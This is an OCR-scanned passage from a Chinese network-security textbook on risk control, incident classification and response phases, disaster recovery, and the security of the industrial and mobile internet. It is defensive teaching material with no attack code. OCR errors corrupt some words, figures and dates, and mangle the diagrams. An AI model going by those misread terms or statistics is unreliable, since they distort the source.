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和 信息 系统 ) ,也 不 必要 追求 绝对 安全 的 网 络 和 信息 系统 。 

常见 的 风险 控制 措施 有 4 种 : 

CD 风险 降低 : 实施 安全 措施 ,以 把 风险 降低 到 一 个 可 接受 的 级 别 。 

@ 风险 承受 : 接受 潜在 的 风险 并 继续 运行 网 络 和 信息 系统 。 

CD 风险 规避 : 通过 消除 风险 的 原因 或 后 果 ( 如 在 发 现 风 险 后 放弃 系统 某 项 功能 或 关 
闭 系统 ) 来 规避 风险 , 即 不 介入 风险 。 

@ 风险 转移 : 通过 使 用 其 他 措施 来 补偿 损失 ,从 而 转移 风险 ,如 购买 保险 。 

即使 是 采取 风险 降低 措施 ,可 能 的 方法 也 有 很 多 种 ,这 取决 于 造成 风险 的 具体 原因 ， 
例如 ,风险 控制 的 实施 点 可 以 有 以 下 几 种 : 

CD 当 存 在 系统 脆弱 性 (缺陷 或 弱点 ) 时 : 减少 或 修补 系统 脆弱 性 ,降低 脆弱 性 被 攻击 
的 可 能 性 。 

@ 当 系 统 脆 弱 性 可 被 恶意 攻击 时 : 运用 层次 化 保护 .结构 化 设计 、 管 理 控制 将 风险 
最 小 化 或 防止 脆弱 性 被 利用 。 

C 当 攻 击 者 的 成 本 小 于 攻击 的 可 能 所 得 时 : 运用 保护 措施 ,通过 提高 攻击 者 成 本 来 
降低 攻击 者 的 攻击 动机 (例如 使 用 系统 访问 控制 ,限制 系统 用 户 的 访问 对 象 和 行为 ) 。 

QD 当 损失 巨大 时 : 运用 系统 设计 中 的 基本 原则 及 结构 化 设计 、 技 术 或 非 技术 类 保护 
措施 来 限制 攻击 的 范围 ,从 而 降低 可 能 的 损失 。 

图 3-32 不 但 阐述 了 风险 控制 的 实施 点 ,也 进一步 对 威胁 ,脆弱 性 和 风险 的 关系 做 了 
说 明 。“ 必 ?表示 只 有 威胁 和 脆弱 性 的 共同 作用 才 会 产生 风险 。 而 如 果 脆 弱 性 不 能 被 利 
用 ,或 者 攻击 者 的 攻击 成 本 大 于 获 利 , 则 都 不 会 造成 风险 。 如 果 安 全 事件 的 损失 可 以 承受 
(例如 这 一 损失 小 于 安全 措施 的 成 本 ), 则 也 可 无 视 其 中 的 风险 。 只 有 在 出 现 了 不 可 接受 
的 风险 后 , 才 需 要 根据 产生 风险 的 原因 采取 针对 性 措施 。 


脆弱 性 


E 存在 可 发 起 攻击 
的 脆弱 性 


预期 损失 
不 可 接受 


攻击 的 成 本 
小 于 获 利 


3-32 ”风险 控制 的 实施 点 
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3.3.8 ”网 络 安全 事件 处 置 与 灾难 恢复 


1. 网 络 安全 事件 分 类 与 分 级 

一 般 而 言 ,仅仅 靠 网 络 安全 策略 和 控制 措施 并 不 能 完全 杜绝 安全 事件 的 发 生 。 即 使 
我 们 采取 了 各 种 安全 防范 措施 ,信息 系统 仍 有 残余 或 未 发 现 的 缺陷 或 脆弱 性 ,导致 网 络 安 
全 事件 的 发 生 ,危害 系统 安全 。 因 此 ,对 网 络 安全 事件 进行 充足 准备 和 有 效 管理 ,将 有 助 
于 提高 安全 事件 响应 的 效率 ,降低 其 可 能 产生 的 影响 和 危害 ,可 从 以 下 几 方 面 和 人手 : 

CD 发 现 . 报 告 和 评估 网 络 安全 事件 。 

Q) 及 时 响应 网 络 安全 事件 ,包括 采取 适当 的 措施 防止 或 降低 危害 ,并 进行 恢复 。 

@ 报告 以 前 尚未 发 现 的 缺陷 和 脆弱 性 。 

@ 从 网 络 安全 事件 中 吸取 经 验 教训 ,建立 和 改进 预防 措施 。 

2017 年 6 月 ,中 央 网 信 办 印发 了 《国家 网 络 安全 事件 应 急 预案 》, 对 国家 网 络 安全 应 
急 的 组 织 体系 ,监测 与 预警 规范 ,应急 处 置 流程 .调查 与 评估 方法 等 作出 了 规定 。 

网 络 安全 事件 的 管理 涉及 很 多 因素 ,分 级 分 类 是 其 快速 有 效 处 置 事件 的 基础 之 一 。 

(1) 网 络 安全 事件 分 类 

国家 标准 GB/Z 20986 一 2007《 信 息 安 全 技术 信息 安全 事件 分 类 分 级 指南 ) 依 据 事件 
发 生 的 原因 ,表现 形式 等 因素 将 网 络 安全 事件 分 为 有 害 程序 事件 、 网 络 攻击 事件 、 信 息 破 
坏事 件 .信息 内 容 安全 事件 .设备 设施 故障 .灾害 性 事件 和 其 他 网 络 安全 事件 等 7 个 基本 
分 类 ,每 个 基本 分 类 分 别 包括 若干 个 子 类 。 

《国家 网 络 安 全 事件 应 急 预 案 ) 中 的 事件 分 类 与 该 标准 一 致 。 

(2) 网 络 安全 事件 分 级 

考虑 信息 系统 的 重要 程度 、 系 统 损 失 和 社会 影响 等 3 个 要 素 ,《 国 家 网 络 安全 事件 应 
急 预 案 ) 将 网 络 安全 事件 分 为 4 个 级 别 : 

CD 特别 重大 事件 ( 工 级 ) , 指 能 够 导致 特别 严重 影响 或 破坏 的 网 络 安全 事件 ,包括 以 
下 情况 : 会 使 特别 重要 信息 系统 遭受 特别 重大 的 系统 损失 ;会 产生 特别 重大 的 社会 影响 。 

@ 重大 事件 (了 [级 ), 指 能 够 导致 严重 影响 或 破坏 的 网 络 安全 事件 ,包括 以 下 情况 : 
会 使 特别 重要 信息 系统 遭受 重大 的 系统 损失 ,或 使 重要 信息 系统 遭受 特别 重大 的 系统 损 
失 ; 产 生 重大 的 社会 影响 。 

@ 较 大 事件 ( 亚 级 ) , 指 能 够 导致 较 严 重 影响 或 破坏 的 网 络 安全 事件 ,包括 以 下 情况 : 
会 使 特别 重要 信息 系统 遭受 较 大 的 系统 损失 ,或 使 重要 信息 系统 遭受 重大 的 系统 损失 、 一 
般 信 息 信息 系统 遭受 特别 重大 的 系统 损失 ;产生 较 大 的 社会 影响 。 

@ 一 般 事件 (级) , 指 能 够 导致 较 小 影响 或 破坏 的 网 络 安全 事件 ,包括 以 下 情况 : 
会 使 特别 重要 信息 系统 遭受 较 小 的 系统 损失 ,或 使 重要 信息 系统 遭受 较 大 的 系统 损失 ,一 
般 信 息 系 统 遭 受 严重 或 严重 以 下 级 别 的 系统 损失 ;产生 一 般 的 社会 影响 。 

2. 网 络 安全 应 急 处 理 关键 过 程 

网 络 安全 应 急 处 理 是 指 , 通 过 制定 应 急 计 划 ,使 影响 信息 系统 安全 的 安全 事件 能 够 得 
到 及 时 响应 ,并 在 安全 事件 发 生 后 进行 标识 、 记 录 、 分 类 和 处 理 , 直 到 受 影响 的 业务 恢复 正 
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常 运行 的 过 程 。 

网 络 安全 应 急 处 理 是 保障 业务 连续 性 的 重要 手段 之 一 ,是 在 处 理 网 络 安全 事件 时 提 
供 紧 急 现场 或 远程 援助 的 一 系列 技术 的 和 非 技术 的 措施 和 行动 ,以 降低 安全 事件 给 用 户 
造成 的 损失 或 影响 ,涵盖 了 在 安全 事件 发 生 后 为 了 维持 和 恢复 关键 的 应 用 所 进行 的 系列 
活动 。 

应 急 处 理 过 程 可 分 为 6 个 阶段 ,17 个 主要 安全 控制 点 ,具体 如 下 : 

(D 准备 阶段 : 目标 是 在 事件 真正 发 生 之 前 为 处 理事 件 做 好 准备 工作 。 主 要 工作 包 
括 建立 合理 的 防御 /控制 措施 、 建 立 适当 的 策略 和 程序 、 获 得 必要 的 资源 和 组 建 响应 队伍 
等 。 该 阶段 有 4 个 控制 点 : 应 急 响 应 需求 界定 、 服 务 合同 或 协议 签订 、 应 急 服 务 方案 界 
定 、 人 员 和 工具 准备 。 

@ 检测 阶段 : 目标 是 对 网 络 安全 事件 做 出 初步 的 动作 和 响应 ,根据 获得 的 初步 材料 
和 分 析 结 果 , 预 估 事 件 的 范围 和 影响 程度 ,制定 进一步 的 响应 策略 ,并 且 保留 相关 证 据 。 
该 阶段 有 3 个 控制 点 : 检测 对 象 及 范围 确定 、 检 测 方案 确定 、 检 测 实施 。 

C 抑制 阶段 : 目标 是 限制 攻击 的 范围 ,抑制 潜在 的 或 进一步 的 攻击 和 破坏 。 主 要 工 
作 包 括 阻止 人 侵 者 访问 被 攻陷 系统 ;限制 人 侵 的 程度 ;防止 人 侵 者 进一步 破坏 等 。 该 阶段 
有 3 个 控制 点 : 抑制 方法 确定 、 抑 制 方法 认可 、 抑 制 实施 。 

CD 根除 阶段 : 目标 是 在 事件 被 抑制 之 后 ,通过 分 析 有 关 亚 意 代码 或 行为 找 出 事件 发 
生 的 根源 ,并 予以 彻底 消除 。 单 机 事件 可 根据 各 种 操作 系统 平台 的 检查 和 根除 程序 进行 
操作 。 对 于 大 规模 爆发 的 带 有 蠕虫 性 质 的 恶意 程序 , 则 需 投 入 更 大 的 人 力 物 力 来 根除 各 
个 主机 上 的 恶意 代码 。 该 阶段 有 3 个 控制 点 : 根除 方法 确定 、 根 除 方法 认可 、 根 除 实施 。 

C 恢复 阶段 : 目标 是 将 网 络 安全 事件 所 涉及 的 系统 还 原 到 正常 状态 。 主 要 工作 包 
括 建 立 临时 业务 处 理 能 力 、 修 复原 系统 损害 、 在 原 系 统 或 新 设施 中 恢复 运行 业务 能 力 等 ， 
需要 避免 误 操作 导致 数据 丢失 。 该 阶段 有 2 个 控制 点 : 恢复 方法 确定 \ 恢 复 系统 。 

@ 总 结 阶段 : 目标 是 回顾 网 络 安全 事件 处 理 的 全 过 程 ,整理 相关 信息 , 尽 可 能 把 所 
有 情况 记录 到 文档 中 。 这 些 记录 的 内 容 对 有 关 部 门 的 其 他 处 理工 作 和 未 来 应 急 工作 的 开 
展 都 具有 重要 意义 。 该 阶段 有 2 个 控制 点 : 总 结 、 报 告 。 


3. 信息 系统 灾难 恢复 

(1) 灾难 恢复 概述 

灾难 恢复 服务 是 指 将 信息 系统 从 灾难 造成 的 故障 或 瘫痪 状态 恢复 到 可 正常 运行 的 状 
态 , 并 将 其 支持 的 业务 功能 从 灾难 造成 的 不 正常 状态 恢复 到 可 接受 状态 的 活动 和 流程 。 
包括 灾难 恢复 规划 和 灾难 备份 中 心 的 日 常 运行 .关键 业务 功能 在 灾难 备份 中 心 的 恢复 和 
重 续 运 行 ,以 及 主 系统 的 灾后 重建 和 回 退 工作 ,还 涉及 突 发 事件 发 生 后 的 应 急 响应 。 与 应 
急 处 理 服务 相 比 , 灾 难 恢 复 服务 的 应 用 范围 较 窗 , 通 常 应 用 于 重大 的 、 特 别 是 灾难 性 的 , 造 
成 长 时 间 无 法 访问 正常 设施 的 事件 。 

一 般 将 灾难 恢复 能 力 划 分 为 6 个 级 别 , 由 低 到 高 逐 级 增强 : 第 1 级 (基本 支持 ); 第 2 
级 (备用 场地 支持 ) ;第 3 级 (电子 传输 和 部 分 设备 支持 ); 第 4 级 (电子 传输 及 完整 设备 支 
持 ); 第 5 级 (实时 数据 传输 及 完整 设备 支持 ) ;第 6 级 (数据 零 丢 失 和 远程 集群 支持 )。 
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(2) 灾难 恢复 关键 过 程 

灾难 恢复 可 分 为 4 个 关键 过 程 : 灾难 恢复 需求 的 确定 、 灾 难 恢复 策略 的 制定 ,灾难 恢 
复 策略 的 实现 ,以 及 灾难 恢复 预案 的 制定 ,落实 和 管理 。 

CD 灾难 恢复 需求 的 确定 : 在 确定 在 灾难 恢复 需求 时 ,应 首先 进行 风险 分 析 , 在 此 基 
础 上 通过 定量 和 /或 定性 的 方法 分 析 网 络 安全 事件 对 业务 的 影响 ,确定 灾难 恢复 目标 , 包 
括 关键 业务 功能 和 恢复 的 优先 顺序 ,以 及 灾难 恢复 时 间 范 围 。 

@ 灾难 恢复 策略 的 制定 : 在 制定 灾难 恢复 策略 时 ,要 着 眼 于 灾难 恢复 所 需 的 7 类 资 
源 要 素 ( 数 据 备份 系统 、 备 用 数据 处 理 系统 、 备 用 网 络 系统 、 备 用 基础 设施 、 专 业 技术 支持 
能 力 、 运 行 维护 管 理 能 力 .灾难 恢复 预案 )。 根 据 灾难 恢复 目标 ,按照 平衡 资源 成 本 与 风险 
可 能 造成 的 损失 的 原则 ( 即 * 成 本 风险 平衡 原则 ”) 确 定 每 项 关键 业务 功能 的 灾难 恢复 策 
略 , 策 略 中 要 明确 灾难 恢复 资源 的 获取 方式 以 及 所 需 的 灾难 恢复 等 级 ,或 灾难 恢复 资源 要 
素 的 具体 要 求 。 

@ 灾难 恢复 策略 的 实现 : 在 实施 灾难 恢复 策略 时 ,一 方面 要 实现 备份 系统 技术 方案 
(包含 数据 备份 系统 .备用 数据 处 理 系统 和 备用 的 网 络 系统 ) , 另 一 方面 要 选择 好 灾难 备份 
中 心 并 建立 各 种 操作 和 管理 制度 ,此 外 还 应 具备 所 需 的 专业 技术 支持 能 力 和 运行 维护 管 
理 能 力 。 

@ 灾难 恢复 预案 的 制定 .落实 和 管理 : 制定 预案 时 ,应 明确 组 织 灾难 恢复 的 目标 和 
范围 .组织 和 职责 、 相 关 人 员 联 络 方式 、 应 急 响应 流程 (包含 灾难 预警 、 人 员 疏 散 、 损 害 评 
估 、 研 判 和 灾难 宣告 ) ,恢复 及 重 续 运 行 流程 .灾后 重建 和 回 退 、 预 案 的 保障 条 件 等 内 容 。 
制定 完成 后 ,应 严格 落实 预案 ,并 对 其 进行 维护 和 变更 管理 。 还 需要 组 织 灾难 恢复 预案 的 
教育 .培训 和 演练 ,确保 相关 人 员 了 解 信息 系统 灾难 恢复 的 目标 和 流程 ,熟悉 灾难 恢复 的 
操作 规程 。 


_ 34 。 新 兴 网 络 及 安全 技术 


3.4.1 工业 互联 网 安全 


1. 工业 互联 网 的 概念 

工业 互联 网 是 全 球 工业 系统 与 高 级 计算 、 分 析 、 感 应 技术 以 及 互联 网 深度 融合 所 形成 
的 全 新 网 络 互 联 模式 。 工 业 互 联网 的 本 质 是 通过 开放 式 的 全 球 化 工业 级 网 络 平台 ,紧密 
融合 物理 设备 ,生产 线 工厂、 运营 商 、 产 品 和 客户 ,高 效 共享 工 业经 济 中 的 各 种 要 素 资源 ， 
通过 自动 化 和 智能 化 的 生产 方式 降低 成 本 、 提 高 效率 ,帮助 制造 业 延 长 产业 链 ,推动 制造 
业 转 型 发 展 。 目 前 ,以 工业 互联 网 为 基础 的 智能 制造 被 视 为 第 4 次 工业 革命 ( 见 图 3-33) 。 

工业 互联 网 的 核心 是 信息 物理 系统 (Cyber-Physical Systems，CPS) ,其 主要 作用 是 
监控 和 控制 生产 过 程 中 的 物理 过 程 , 包 括 状态 监控 ,远程 诊断 和 实时 远程 控制 生产 系统 
等 。 工 业 互 联网 发 展 趋势 的 典型 特点 是 通过 网 络 (例如 Internet 等 ) 连 接 工业 系统 中 各 种 
CPS 设备 ,集成 先进 的 计算 资源 和 方式 ,实现 生产 和 运营 过 程 的 自动 化 和 智能 化 ,优化 产 
业 组 织 管理 和 企业 价值 链 , 节 约 材 料 和 人 工 等 生产 资源 ,提高 产品 个 性 化 开发 能 力 和 大 规 
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图 3-33 工业 革命 进程 

模 生 产 效 率 。 

2. 工业 互联 网 面临 的 新 安全 挑战 

现代 工业 互联 网 建设 面临 的 主要 挑战 是 在 各 类 设备 正确 和 可 靠 运行 的 前 提 下 ,实现 
低 成 本 的 多 重 实时 安全 防护 。 与 传统 信息 系统 成 熟 的 安全 防护 体系 相 比 ,含有 大 量 CPS 
设备 的 工业 互联 网 安全 防护 措施 相对 滞后 。 因 此 ,在 传统 信息 系统 和 CPS 系统 集成 联网 
后 ,工业 互联 网 更 容易 遭受 网 络 攻击 。 

(1) 传统 攻击 方式 的 危害 性 更 大 

经 过 改进 后 的 蠕虫 病毒 和 木马 等 传统 攻击 方式 已 经 严重 威胁 工业 互联 网 安全 。 最 
早 针 对 工业 控制 系统 的 攻击 之 一 是 斯 拉 姆 默 蠕 虫 (Slammer worm), 它 在 2003 年 成 功 感 
染 了 美国 一 个 核电 站 的 两 个 关键 监控 计算 机 , 造成 安全 参数 监控 显示 面板 瘫痪 。 同 年 ， 
计算 机 病毒 感染 了 美国 CSX 交通 运输 公司 的 计算 机 系统 ,并 关闭 了 交通 信号 .调度 和 其 
他 系统 ,导致 该 公司 客运 和 货运 列车 服务 完全 瘫痪 。 针 对 工业 互联 网 的 网 络 攻击 也 会 严 
重 威胁 国家 安全 ,比如 Stuxnet 蠕虫 利用 "* 零 日 漏洞 "导致 伊朗 核 设施 中 的 离心 机 故障 。 

(2) 网 络 攻击 的 入 口 更 多 

由 于 工业 互联 网 集成 多 类 不 同系 统 ,所 以 存在 多 种 攻击 发 起 点 。 攻 击 者 可 以 从 物理 
层 、 网 络 层 和 控制 层 分 别 发 起 攻击 ( 见 图 3-34)。 在 物理 层 , 智 能 电子 设备 本 身 容易 受到 
硬件 入 侵 、 旁 路 攻击 和 逆向 工程 攻击 等 物理 攻击 ,其 系统 软件 也 面临 特洛伊 木马 ,病毒 和 
运行 时 攻击 等 安全 风险 。 在 网 络 层 ,通信 协议 可 能 受到 中 间 人 和 拒绝 服务 攻击 等 多 种 网 
络 攻击 。 在 控制 层 , 操 作 工 业 互 联网 设备 的 用 户 可 能 受到 钓鱼 网 站 攻击 等 社交 攻击 。 


3. 工业 互联 网 主要 安全 防护 技术 

因为 传统 信息 系统 和 工业 互联 网 之 间 存 在 许多 差异 ,所 以 实现 工业 互联 网 安全 不 能 
简单 使 用 现 有 的 信息 安全 解决 方案 。 例 如 , 当 发 生 网 络 攻击 时 ,传统 信息 系统 通常 会 牺牲 
可 用 性 ,暂时 禁用 被 攻击 的 服务 ,直到 攻击 解除 。 然 而 ,工业 生产 系统 最 重要 的 目标 是 可 
用 性 ,以 避免 生产 力 和 收入 损失 。 这 个 目标 需要 工业 互联 网 能 够 抵御 拒绝 服务 攻击 。 

除了 可 用 性 ,工业 互联 网 系统 必须 保证 系统 的 完整 性 ,防止 对 设备 的 蓄意 损坏 或 者 恶 
意 使 用 假冒 劣质 生产 组 件 (或 软件 ) ,避免 对 工业 生产 过 程 和 产品 质量 造成 损害 。 联 网 后 
的 工业 互联 网 系统 ,必须 确保 局 部 系统 故障 或 恶意 攻击 不 会 在 系统 内 部 或 跨 企业 传播 。 
在 智能 产品 方面 ,工业 互联 网 的 目标 之 一 是 实现 产品 制造 和 使 用 历史 的 可 追溯 性 和 真实 
性 ,自主 控制 生产 过 程 。 当 存在 产品 质量 争议 时 ,能够 向 第 三 方 仲裁 机 构 提 供 资源 材料 质 
量 和 产品 生产 正确 性 的 证 据 。 为 防止 工业 间谍 对 工业 互联 网 系统 信息 的 窃取 ,需要 保证 
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图 3-34 工业 互联 网 攻击 入 口 


整个 系统 敏感 信息 的 保密 性 和 完整 性 ,以 及 员工 信息 的 隐私 性 。 

在 工业 互联 网 系统 中 ,主要 通过 工业 4.0 安全 工程 的 5 个 阶段 ,检测 安全 防护 技术 和 
方案 的 适用 性 : 

CD 安全 人 员 培 训 : 通过 培训 、 工 具 检 测 、 题 目 检测 等 方式 ,提高 企业 员工 安全 意识 ， 
使 员工 深刻 认识 网 络 安 全 的 重要 性 并 按照 制度 进行 工作 。 

@ 安全 需求 制定 和 实施 计划 : 安全 人 员 根 据 企业 IT 系统 、CPS 系统 架构 和 企业 数 
据 等 制定 网 络 安全 需求 和 实施 方案 ,包括 需要 实现 的 安全 目标 (可 用 性 、 完 整 性 ,保密 性 、 
真实 性 等 ) 和 网 络 安全 软 硬 件 等 。 

@ 安全 硬件 和 软件 设计 实现 和 评估 ;基于 安全 硬件 和 处 理 器 级 别 的 安全 执行 环境 ， 
搭建 可 信安 全 计算 平台 ,相关 的 解决 方案 包括 SMART、SPM、TrustLite 等 。 

(D 安全 方案 部 署 : 将 安全 设备 和 软件 部 署 到 工业 互联 网 系统 中 的 各 个 部 件 。 

信息 反馈 、 测 试 和 升级 : 根据 工业 生产 实际 情况 、 网 络 攻击 日 志和 新 功能 需求 等 
反馈 信息 调整 安全 解决 方案 。 


3.4.2 ”移动 互联 网 安全 


1. 移动 互联 网 的 概念 

移动 互联 网 (Mobile Internet) 是 指 利用 互联 网 的 技术 平台、 应 用 以 及 商业 模式 与 移 
动 通信 技术 相 结合 并 实践 的 活动 统称 。 广 义 上 ,移动 互联 网 是 移动 通信 与 互联 网 结合 
产物 ,其 整合 移动 通信 技术 和 互联 网 技术 ,以 各 种 无 线 网 络 (WWAN、WLAN、WMAN、 
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WPAN,WSN,WBAN 等 ) 为 接 入 网 ,为 各 种 移动 终端 (手机 、 笔 记 本 计算 机 、.POS 机 、 可 穿 
戴 设 备 .智能 车 载 设备 .智能 家 居 .智能 无 人 机 等 ) 提 供 信息 服务 。 狭 义 上 的 移动 互联 网 是 
以 手机 为 终端 ,通过 移动 通信 网 络 接 入 互联 网 。 

移动 互联 网 具有 网 络 融合 化 ,终端 智能 化 、 应 用 多 样 化 、 业 务 多 元 化 .平台 开放 化 等 特 
点 。 通 过 移动 互联 网 ,人 们 在 家 里 、 地 铁 、 机 场 、 火 车 站 等 地 方 可 以 随时 使 用 手机 等 移动 终 
端 浏览 网 页 ,收发 邮件 在线 诊 疗 ,在线 教 育 .在 线 政 务 .共享 位 置 .移动 支付 .移动 网 游 、 即 
时 通信 等 ,享受 各 类 新 型 移动 应 用 服务 带 来 的 方便 与 快捷 。 移 动 互联 网 的 移动 性 优势 决 
定 了 用 户 数量 庞大 。 根 据 中 国 互联 网 络 信息 中 心 CCNNIC) 发 布 的 第 45 次 (中 国 互联 网 
络 发 展 状 况 统计 报告 ),2019 年 ,我 国 已 建成 全 球 最 大 规模 光纤 和 移动 通信 网 络 。 截 至 
2020 年 3 月 15 日 ,我 国 网 民 规模 达 9.04 亿 , 其 中 ,手机 网 民 规 模 达 8.97 亿 , 网 民 使 用 手 
机 上 网 的 比例 达 99.325, 2019 年 1 一 12 月 ,移动 互联 网 接 入 流量 消费 达 1220 亿 GB。 移 
动 互 联网 使 得 * 任 何人、 任何 时 间 、 任 何 地方 * 可 以 享受 网 络 服务 成 为 现实 ,真正 实现 了 * 把 
互联 网 装 入 口袋 ”的 梦想 。 

移动 互联 网 的 组 成 主要 包括 4 大 部 分 : 移动 互联 网 终端 设备 、 移 动 互联 网 通信 网 络 、 
移动 互联 网 应 用 和 移动 互联 网 相关 技术 ,如 图 3-35 所 示 。 


| Sai th hh th rt be 
INT 通信 网 络 网 络 应 用 ] | 
1 | 三 手机 WWAN 收发 邮件 | | | 
1 
| 笔记 本 WLAN 在 线 教育 | | | 
1 
| POS 机 WPAN 在 线 政务 | | | 
! | [rinse WSN 移动 支付 ] | | 
| 二 - - | 
! | [esie WBAN 即时 通信 ] | | 
| | 
1 | 。 终端 技术 通信 技术 应 用 技术 “|! 
| 移动 互联 网 相关 技术 | 


图 3-35 移动 互联 网 组 成 架构 


2. 移动 互联 网 面临 的 新 安全 挑战 

移动 互联 网 技术 是 移动 通信 技术 和 互联 网 技术 深度 融合 的 产物 ,其 取 之 于 传统 技术 ， 
而 又 超脱 于 传统 技术 。 不 可 避免 地 ,移动 互联 网 也 继承 了 传统 互联 网 技术 的 安全 漏洞 。 
此 外 ,移动 互联 网 具有 移动 性 、 私 密 性 和 融合 性 的 特性 ,其 技术 开放 化 ,网 络 异 构 化 ,智能 
终端 用 户 基数 大 、 自 组 织 能 力 强 ,使 得 用 户 行为 难以 溯源 。 同 时 ,移动 互联 网 市 场 仍然 处 
于 “粗放 型 ”发展 阶段 ,涉及 大 量 的 用 户 个 人 信息 (如 位 置信 息 、 通 信 信 息 、 日 志 信 息 、 账 户 
信息 、 支 付 信息 、 传 感 采 集 信息 ,设备 信息 ,文件 信息 等 ) ,这些 均 给 移动 互联 网 安全 监管 和 
用 户 隐私 保护 带 来 极 大 的 挑战 。 

国家 计算 机 病毒 应 急 处 理 中 心 2019 4E 9 H 15 日 发 布 的 (第 十 八 次 计算 机 病毒 和 移 
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动 终端 病毒 疫情 调查 报告 ?显示 ,2018 年 我 国 移动 终端 病毒 感染 率 达 45.4%, 比 2017 年 
上 升 11.84% 。 移 动 终端 感染 病毒 后 ,可 能 造成 多 种 危害 ,其 中 位 居 前 三 的 危害 分 别 为 影 
响 手机 正常 运行 信息 泄露 .恶意 扣 费 , 占 比 分 别 达 72.3%、71.47% 和 58.11%。 近 期 , 移 
动 互联 网 的 恶意 行为 已 从 针对 移动 终端 的 系统 破坏 、 恶 意 扣 费 、 资 费 消耗 等 形式 ,逐步 向 
强制 推广 ,风险 传播 越权 收集 等 行为 转变 ,与 移动 互联 网 相关 的 新 型 网 络 违 法 犯罪 日 益 
突出 。 

3. 移动 互联 网 主要 安全 防护 技术 

根据 移动 互联 网 的 特征 和 组 成 架构 ,移动 互联 网 的 安全 问题 可 以 分 为 3 大 部 分 : 移 
动 互联 网 终端 安全 ,移动 互联 网 网 络 安全 和 移动 互联 网 应 用 安全 ,如 图 3-36 Bron 


人 

| 应 用 安全 1 || 安 

i 1 | 全 

- NT TS - FS 

T| [应 用 访问 控制 内 容 过 滤 安全 隧道 安全 审计 lu 

| | 

| — 
安 | | 网 络 安全 | 
全 | | 1 [| 十 | 莫 
是 p [双向 认证 技术 | [异常 流量 监控 | | 空中 接口 安全 ] [GSM 安 全 机 制 J| E 

| 1 

1 | 三 访问 授权 控制 | | 入 侵 检 测 机 制 ，] [ 攻击 防御 与 济源 | | 规范 网 络 标准 ] | | 于 

| | 

I 1 

| 终端 安全 Mi 

1 | [. senes 软件 签名 访问 控制 mew ”||! | | 昌 
Dou ee sss 4 L— 

图 3-36 移动 互联 网 安全 架构 
COD 移动 互联 网 终端 安全 


智能 移动 终端 已 成 为 人 们 生活 的 必需 品 , 移 动 终端 的 安全 关系 着 我 们 最 直接 的 信息 
和 隐私 安全 ,是 不 可 忽视 的 安全 要 素 。 移 动 互 联网 终端 安全 主要 包括 移动 终端 硬件 安全 、 
终端 操作 系统 安全 ,终端 应 用 软件 安全 以 及 终端 设备 上 的 信息 安全 。 

移动 终端 硬件 包括 基带 芯片 和 物理 器 件 ,容易 受到 物理 攻击 ,攻击 者 可 能 利用 高 科技 
手段 (如 探 针 、 光 学 显微镜 等 方式 ) 获 取 硬 件 信 息 。 终 端 操作 系统 容易 遭受 各 类 恶意 攻击 ， 
如 攻击 者 会 利用 蠕虫 病毒 .木马 病毒 .恶意 代码 钓鱼 网 站 等 破坏 操作 系统 。 终 端 应 用 软 
件 存在 病毒 植 入 、 身 份 认 证 、 越 权 访问 等 安全 威胁 。 终端 设备 中 存储 的 用 户 数 据 和 隐私 信 
息 存 在 被 非法 获取 和 自 改 的 安全 威胁 。 

目前 解决 移动 互联 网 终端 安全 问题 的 主要 防护 策略 是 引入 可 信 计 算 技 术 ,构造 安全 、 
可 信 的 智能 移动 终端 。 推 出 终端 查 毒 .杀毒 等 安全 软件 ,利用 病毒 防护 技术 加 强 对 木马 后 
门 .邮件 病毒 .恶意 网 页 代码 等 主流 病毒 的 过 滤 和 拦截 能 力 , 加 强 对 灰色 软件 .间谍 软 件 及 
其 变种 的 阻 断 能 力 。 利 用 数字 签名 技术 保障 软件 和 数据 的 完整 性 ,防止 被 非法 自 改 。 利 
用 密码 加 密 技 术 对 存储 数据 、 传 输 数 据 进 行 加 密 , 防 止 被 非法 窃取 ,保障 用 户 信息 的 机 
156 


(2) 移动 互联 网 网 络 安全 

移动 互联 网 网 络 安全 包括 设备 与 环境 安全 、 传 输 安全 和 信息 安全 。 移 动 互联 网 设备 
与 环境 安全 主要 指 路 由 器 、. 接 人 网 服务 器 等 网 络 设备 自身 的 安全 性 以 及 设备 所 处 环境 温 
JE .湿度 .电磁 访问 控制 等 条 件 需要 符合 一 定 的 标准 要 求 , 其 安全 受到 自然 环境 的 制约 。 
传输 安全 主要 指 接 人 网 络 服务 基站 传输线 路、 空中 接口 等 的 安全 性 ,容易 遭受 恶意 破坏 、 
非法 窃听 、 接 入 等 安全 攻击 。 移 动 互 联网 信息 安全 主要 指 信息 在 空中 接口 传播 .IP 承载 
网 和 互联 网 等 传递 线路 上 的 安全 性 ,信息 容易 遭受 非法 获取 、 自 改 、 重 放 等 安全 攻击 。 

针对 移动 互联 网 网 络 安 全 存在 的 隐患 ,主要 防护 策略 是 增强 网 络 设备 操作 系统 、 中 间 
件数 据 库 、 基 础 协议 栈 等 的 防 攻 击 、 防 人 侵 能 力 , 规 范 制定 网 络 接 入 标准 、 设 备 电 气 化 标 
准 等 ,定时 维护 设备 ,并 严格 遵守 设备 的 使 用 要 求 。 采 用 双向 身份 认证 \ 访 问 授权 机 制 、 安 
全 协议 和 密码 算法 等 方式 确保 合法 用 户 可 以 正常 使 用 网 络 服务 ,防止 业务 被 盗用、 冒名 使 
用 等 情况 的 发 生 。 利 用 入 侵 检测 机 制 和 加 密 技术 为 网 络 信 息 提供 必要 的 隔离 和 隐私 
防护 。 

(3) 移动 互联 网 应 用 安全 

移动 互联 网 应 用 包括 复制 于 传统 互联 网 和 移动 通信 和 网络 上 的 业务 ,以 及 由 移动 通信 
网 络 与 传统 互联 网 相互 融合 所 产生 的 创新 型 业务 。 目 前 的 移动 互联 网 业务 包括 利用 移动 
智能 终端 获取 的 移动 Web 移动 搜 索 、 移 动 浏览 移动 支付 .移动 定位 移动 导航 、 移 动 在 
线 教育 .在线 电子 商务 ,在 线 游戏 ,移动 即时 通信 .移动 广告 等 业务 。 

由 于 移动 互联 网 业务 种 类 繁多 、 应 用 形态 多 样 . 用 户 规 模 庞 大 、 生 态 环 境 复杂 ,使 得 移 
动 互 联网 应 用 安全 面临 更 严峻 的 威胁 。 应 用 访问 控制 采用 安全 隧道 技术 ,可 为 应 用 系统 
提供 严格 统一 的 基于 身份 令 牌 和 数字 证 书 的 身份 认证 机 制 。 基 于 属性 证 书 的 访问 权限 控 
制 , 可 以 有 效 地 防止 攻击 者 对 资源 的 非 授权 访问 。 利 用 名 单 过 滤 技 术 、 关 键 词 过 滤 技 术 、 
图 像 过 滤 技 术 ,模板 过 滤 技 术 和 智能 过 滤 技 术 等 可 对 不 良 的 Web. 内 容 ,垃圾 邮件 、 恶 意 短 
信 等 进行 过 滤 。 

